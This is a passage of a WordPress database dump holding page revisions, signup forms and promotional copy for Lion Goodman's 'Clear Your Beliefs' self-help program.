1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-02 12:42:58', '2014-12-02 17:42:58', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1864, 2, '2014-12-02 12:47:53', '2014-12-02 17:47:53', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 32px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-02 12:47:53', '2014-12-02 17:47:53', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1865, 2, '2014-12-02 12:59:51', '2014-12-02 17:59:51', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 32px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">FREE (for a limited time)</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-02 12:59:51', '2014-12-02 17:59:51', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1875, 2, '2014-12-02 13:42:43', '2014-12-02 18:42:43', '', 'Clear-Your-Beliefs', '', 'inherit', 'closed', 'open', '', 'clear-your-beliefs-2', '', '', '2014-12-02 13:42:43', '2014-12-02 18:42:43', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg', 0, 'attachment', 'image/jpeg', 0),
(1893, 2, '2014-12-02 20:09:10', '2014-12-03 01:09:10', '', 'Clear-your-beliefs-ebook', '', 'inherit', 'closed', 'open', '', 'clear-your-beliefs-ebook', '', '', '2014-12-02 20:09:10', '2014-12-03 01:09:10', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png', 0, 'attachment', 'image/png', 0),
(1904, 2, '2014-12-03 19:15:33', '2014-12-04 00:15:33', '<h1 style="text-align: center;">Free 15-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether <em>Clear Your Beliefs</em> is right for you?\r\n\r\nRegister for a free 15-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "<em><strong>Clear Your Beliefs</strong></em>," as a gift. It''s a beautiful introduction to the topic of beliefs, belief change, and the <em>Clear Your Beliefs program</em>.\r\n\r\nSchedule your free consultation now:  \r\n\r\n<iframe width="750" height="600" src="https://my.timedriver.com/P4T2P?sh=1" frameborder="0"></iframe>\r\n\r\nOne of our professional <em>Clear Your Beliefs Coaches</em> will contact you at the appointed time.\r\n\r\nMost people find this initial consultation so valuable that they want to go deeper immediately. After 15-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nAfter your session, please write to us at <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>, and let us know about your experience.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>', 'Free 15-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-12-03 19:15:33', '2014-12-04 00:15:33', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1903, 2, '2014-12-03 19:03:36', '2014-12-04 00:03:36', '<h1 style="text-align: center;">Free 15-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether <em>Clear Your Beliefs</em> is right for you?\r\n\r\nRegister for a free 15-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "<em><strong>Clear Your Beliefs</strong></em>," as a gift. It''s a beautiful introduction to the topic of beliefs, belief change, and the <em>Clear Your Beliefs program</em>.\r\n\r\nSchedule your free consultation now:  \r\n\r\n<iframe width="750" height="600" src="https://my.timedriver.com/P4T2P?sh=1" frameborder="0"></iframe>\r\n\r\nOne of our professional <em>Clear Your Beliefs Coaches</em> will contact you at the appointed time.\r\n\r\nMost people find this initial consultation so valuable that they want to go deeper immediately. After 15-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nAfter your session, please write to us at <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 650px;">\r\n\r\n<h1 style="text-align: center;">Schedule Your Free 20-minute Consultation</h1>\r\n<div style="width: 47%; float: left;">\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div></div>\r\n<div style="width: 47%; float: left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 60px auto; float: right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</form>\r\n</div>\r\n</div>\r\n</div>', 'Free 15-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-12-03 19:03:36', '2014-12-04 00:03:36', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1908, 2, '2014-12-04 16:41:05', '2014-12-04 21:41:05', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n.\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script 